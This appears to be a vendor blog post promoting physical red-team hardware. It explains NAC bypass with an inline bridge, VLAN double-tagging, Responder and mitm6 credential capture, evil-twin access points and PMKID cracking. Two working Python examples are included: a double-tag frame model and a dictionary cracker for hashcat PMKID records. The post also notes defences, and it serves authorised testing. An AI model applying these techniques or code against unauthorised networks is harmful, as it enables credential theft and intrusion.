NAC Bypass, Evil Twin, and Credential Harvesting: Automating Physical Pentests

Yves Soete · May 2, 2026
Blacksight LLC: purpose-built hardware for these techniques at red.blacksight.io

Physical penetration tests have traditionally been manual, high-touch operations. An operator walks into a building, plugs in hardware, runs tools from a laptop, and hopes their SSH tunnel holds for the next 48 hours. Modern red team hardware automates these techniques — NAC bypass, credential harvesting, evil twin WiFi, and passive recon — into a single device that runs unattended and exfiltrates over 4G.

Physical red team operations test the hardest security boundary to defend: the network perimeter when someone is already inside the building. Social engineering gets you through the door. What you do once you have physical access to the network determines the engagement's value.



NAC bypass: getting on the network



Network Access Control is the first obstacle. Most enterprise networks require a device to authenticate on the switch port, via 802.1X (EAP) or, for devices that cannot speak 802.1X such as printers and phones, MAC Authentication Bypass (MAB), before it gets a VLAN assignment and IP address. An unauthenticated device lands on a quarantine VLAN or gets no connectivity at all.

The bypass technique is a transparent Layer-2 bridge. You unplug an authenticated device (a printer, a VoIP phone, a workstation) and insert a bridging device inline between it and the switch port. The bridge forwards all traffic transparently and the legitimate device re-authenticates through it: the switch sees a brief link flap, then the same MAC address and a normal 802.1X or MAB exchange, and the bridge rides on the resulting authorized session. Two details make or break this. The bridge must forward EAPOL frames (destination 01:80:C2:00:00:03), which a stock Linux bridge drops unless its group_fwd_mask is set to pass them, and it must never put its own MAC or IP on the wire: anything the operator originates has to be rewritten to the authenticated host's MAC and IP, on ports that host is not using. Where the port enforces MACsec (802.1AE) the technique fails outright, because the bridge can neither read nor inject frames without the session keys.

This requires two Ethernet ports and the ability to operate as a transparent bridge at wire speed. Consumer hardware with a single NIC, or a Raspberry Pi bridging through a USB adapter, struggles to do this reliably. The Blacksight Phantom has dual 2.5GbE ports specifically for this purpose: plug it inline, and Tap mode handles the bridge automatically.

Once on the network, VLAN hopping via DTP negotiation and 802.1Q double-tagging can extend access beyond the initial VLAN. Both are automated in Tap mode. Both also depend on switch misconfiguration: DTP negotiation only yields a trunk when the port was left in dynamic auto or desirable mode rather than hard-coded as an access port, and double-tagging only works when the attacker's VLAN is the native VLAN of the uplink trunk. Even then it is one-way, since hosts in the target VLAN have no path back to the attacker.
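To make the double-tagging condition concrete, here is an added example (mine, not Blacksight's Tap mode code) that builds a double-tagged frame from raw bytes and models the two switch behaviours the attack relies on: a trunk port sending native-VLAN traffic untagged, and the downstream switch filing a frame under whatever tag is then outermost. The MACs and VLAN IDs are made up for illustration.

```python
"""
802.1Q double-tagging, modelled end to end with raw frame bytes.
Added example; the MACs and VLAN IDs are made up for illustration.
"""
import struct

TPID_8021Q = 0x8100     # TPID that announces a VLAN tag
ETHERTYPE_IPV4 = 0x0800


def mac_bytes(text):
    return bytes.fromhex(text.replace(":", ""))


def vlan_tag(vid, pcp=0):
    """One 802.1Q tag: TPID 0x8100 then a TCI of 3-bit PCP, 1-bit DEI, 12-bit VID."""
    if not 0 <= vid < 4096:
        raise ValueError("VID must fit in 12 bits")
    return struct.pack("!HH", TPID_8021Q, (pcp << 13) | vid)


def build_frame(dst, src, vids, payload, ethertype=ETHERTYPE_IPV4):
    """Ethernet II frame carrying zero or more stacked tags, outermost first."""
    tags = b"".join(vlan_tag(v) for v in vids)
    return mac_bytes(dst) + mac_bytes(src) + tags + struct.pack("!H", ethertype) + payload


def parse_tags(frame):
    """Return (list of VIDs outermost first, ethertype of the payload)."""
    vids, off = [], 12
    while struct.unpack_from("!H", frame, off)[0] == TPID_8021Q:
        tci = struct.unpack_from("!H", frame, off + 2)[0]
        vids.append(tci & 0x0FFF)
        off += 4
    return vids, struct.unpack_from("!H", frame, off)[0]


def trunk_egress(frame, native_vid):
    """Trunk port behaviour the attack relies on: frames in the native VLAN leave
    untagged, so the outermost tag is removed when it equals native_vid."""
    vids, _ = parse_tags(frame)
    if vids and vids[0] == native_vid:
        return frame[:12] + frame[16:]
    return frame


def receiving_switch_vlan(frame, trunk_native_vid):
    """The downstream trunk port files an untagged frame under its native VLAN and
    a tagged frame under the VID of whatever tag is now outermost."""
    vids, _ = parse_tags(frame)
    return vids[0] if vids else trunk_native_vid


def double_tag_hop(attacker_vid, native_vid, target_vid):
    """VLAN in which the downstream switch delivers an attacker frame tagged
    [attacker_vid, target_vid]. Equals target_vid only when attacker_vid is the
    trunk's native VLAN; otherwise the frame stays in the attacker's own VLAN."""
    frame = build_frame("ff:ff:ff:ff:ff:ff", "02:00:00:00:00:01",
                        [attacker_vid, target_vid], b"\x45" + b"\x00" * 19)
    return receiving_switch_vlan(trunk_egress(frame, native_vid), native_vid)


if __name__ == "__main__":
    print("native VLAN 1, attacker in VLAN 1 ->", double_tag_hop(1, 1, 20))    # 20: hop works
    print("native VLAN 99, attacker in VLAN 1 ->", double_tag_hop(1, 99, 20))  # 1: hop fails
```

Running it shows the frame landing in VLAN 20 when the attacker sits in the native VLAN and staying in VLAN 1 otherwise. The second case is also the defence: move the trunk's native VLAN to an unused ID and configure the switch to tag native-VLAN traffic, and there is no tag for the trunk to strip.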



Credential harvesting: Responder and beyond



With network access established, the next step is credential collection. Responder remains the most effective tool for this on Windows-dominated networks. It answers LLMNR, NBT-NS, and mDNS queries for names that do not resolve (typos, stale shares, missing WPAD entries) with its own address, so the client authenticates to the attacker's machine. What it captures is not the NT hash itself but the NTLMv2 challenge/response pair (Net-NTLMv2): the server challenge Responder issued, the client's HMAC-MD5 proof, and the blob the proof was computed over. That pair can be cracked offline by dictionary attack (hashcat mode 5600) or, with Responder's own SMB and HTTP servers disabled and a relay tool such as ntlmrelayx in their place, relayed live to hosts that do not require SMB signing.

The manual version requires an operator to be physically present or have a stable remote connection to manage Responder, monitor captures, and adjust settings. The automated version — Venom mode on the Phantom — starts Responder on boot, captures hashes continuously, and exfiltrates them to the dashboard over 4G in near-real-time.

Beyond Responder, Venom mode includes IPv6 WPAD/DNS takeover via mitm6, which answers the DHCPv6 solicits Windows hosts send by default and hands them an attacker-controlled DNS server, so it works even on networks that have disabled LLMNR and NBT-NS; ARP cache poisoning for targeted MitM; and rogue DHCP for network-wide interception. These can run simultaneously or be scheduled for specific time windows to blend with normal business traffic. Rogue DHCP and ARP poisoning are the loudest of the set: a mistyped gateway or lease takes clients offline, which is how these get noticed, so test the configuration against a single target before letting it run network-wide.



Evil twin WiFi: attacking the wireless perimeter



Siren mode clones legitimate WiFi SSIDs to create evil twin access points. Employees and visitors connect to what appears to be the corporate WiFi but is actually controlled by the Phantom. Traffic flows through the device, allowing credential capture via captive portals, HTTPS interception where the client accepts an untrusted certificate (no HSTS, no certificate pinning, or a user clicking through the warning), and passive monitoring of all wireless activity. Cloning an open or PSK network is straightforward; cloning a WPA2-Enterprise SSID only yields credentials from clients that do not validate the RADIUS server certificate, which is the setting worth confirming during recon.

WPA/WPA2 handshake capture runs in parallel: the device records the EAPOL 4-way handshake from legitimate associations (the first two messages are enough) and pushes it to the dashboard for offline cracking. PMKID capture provides a quieter alternative: the device sends a single association request to the AP and reads the PMKID out of the RSN information element in the AP's first EAPOL message, so no client has to be present and nothing is deauthenticated. It is clientless, not silent (one frame is transmitted), and it only works against APs that include the PMKID, which is common but not universal.
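The PMKID paragraph above leaves out why a single AP frame is enough to attack the passphrase; this added example (mine, not Siren mode's code) shows the arithmetic: PMK from passphrase and SSID via PBKDF2, PMKID from the PMK and the two MACs, written into hashcat's 22000 record format and then recovered by a dictionary loop. The SSID, MACs, passphrase and wordlist are made up, and the capture line is built here from a known passphrase rather than recorded from a real AP.

```python
"""
What a captured PMKID is used for: derive it from a candidate passphrase and compare.
Added example; the SSID, MACs and wordlist are made up, and the capture line is
built here from a known passphrase rather than recorded from a real AP.
"""
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid(pmk, ap_mac, sta_mac):
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC).
    The AP places this in the RSN IE of EAPOL message 1, which is what gets captured."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def hashcat_22000_line(pmkid_bytes, ap_mac, sta_mac, ssid):
    """hashcat mode 22000 PMKID record: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID_hex***"""
    return f"WPA*01*{pmkid_bytes.hex()}*{ap_mac.hex()}*{sta_mac.hex()}*{ssid.encode().hex()}***"


def parse_22000(line):
    """Return (pmkid, ap_mac, sta_mac, ssid) from a type-01 record."""
    fields = line.split("*")
    if fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a PMKID (type 01) record")
    return (bytes.fromhex(fields[2]), bytes.fromhex(fields[3]),
            bytes.fromhex(fields[4]), bytes.fromhex(fields[5]).decode())


def crack_pmkid(line, wordlist):
    """Dictionary attack: one PBKDF2 (4096 SHA-1 rounds) plus one HMAC per candidate."""
    target, ap_mac, sta_mac, ssid = parse_22000(line)
    for candidate in wordlist:
        guess = pmkid(pmk_from_passphrase(candidate, ssid), ap_mac, sta_mac)
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def constructed_capture(ssid, passphrase):
    """Fixture standing in for a captured EAPOL M1: made-up AP and client MACs."""
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    value = pmkid(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac)
    return hashcat_22000_line(value, ap_mac, sta_mac, ssid)


if __name__ == "__main__":
    line = constructed_capture("CorpGuest", "Welcome2024")
    print(line)
    print("cracked:", crack_pmkid(line, ["password", "CorpGuest1", "Welcome2024"]))
```

In Python each candidate costs a 4096-round PBKDF2, so this is a demonstration only; the real run is hashcat -m 22000 on the dashboard export. The PMKID contains no nonce from the client side, which is why one frame suffices, and also why a long random PSK defends against PMKID capture exactly as well as against a full handshake capture: both reduce to a dictionary attack on the passphrase.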

Traditional evil twin setups require a dedicated laptop, an external WiFi adapter, hostapd configuration, dnsmasq, iptables rules, and constant monitoring. Siren mode reduces this to a toggle in the web panel.



Passive recon: what Scope mode captures



Not every engagement starts loud. Scope mode provides passive-only reconnaissance, with zero packets sent on the target network: full packet capture to an encrypted partition, network asset discovery via traffic analysis, WiFi enumeration (SSIDs, channels, encryption, signal strength, hidden networks), and Bluetooth/BLE device enumeration and tracking.

Stealth mode is a master toggle that restricts the device to passive operation only. When stealth is active, no attack modes can run — the device listens without transmitting. This is critical for the first phase of an engagement when the operator needs to map the environment before deciding which attacks to run.

Scope can also run alongside active modes. While Venom is harvesting credentials on the wired network, Scope is silently mapping the entire wireless and Bluetooth landscape — building a complete picture of the target environment without sending any additional packets.



Automated playbooks: set and forget



The Phantom supports chained attack sequences. Define a playbook: run Scope for 30 minutes to map the network, automatically enable Venom for credential harvesting, exfiltrate captured hashes every hour, and switch to Siren mode after business hours when employees connect to WiFi from the parking lot.

Scheduled operations add time windows to each mode. Run Venom only during business hours (08:00-18:00) when LLMNR traffic is heaviest. Run Siren during lunch hours when employees are on mobile devices. Run Scope 24/7 for continuous monitoring.

This removes the operator from the loop entirely during the deployment phase. Plant the device, activate the playbook, and collect results from the dashboard. Return to the site only to retrieve the hardware — or trigger self-destruct remotely and walk away.



The Scout: when you only need recon



Not every engagement requires a full attack platform. The Blacksight Scout ($499) is a compact recon stick that does one thing well: wireless intelligence. It enumerates every WiFi network, Bluetooth device, client, and probe request in range. Plug it into a USB-C power source, attach a USB 4G dongle, and it phones home automatically.

Deploy Scouts at target locations days before the main engagement. Build a complete wireless landscape map — which SSIDs exist, what encryption they use, how many clients connect, what devices are probing for networks they remember. This intelligence directly informs which attack modes to run on the Phantom when you deploy it.

Both devices are available at red.blacksight.io. No subscriptions — the dashboard, relay, and all features are included with the hardware.
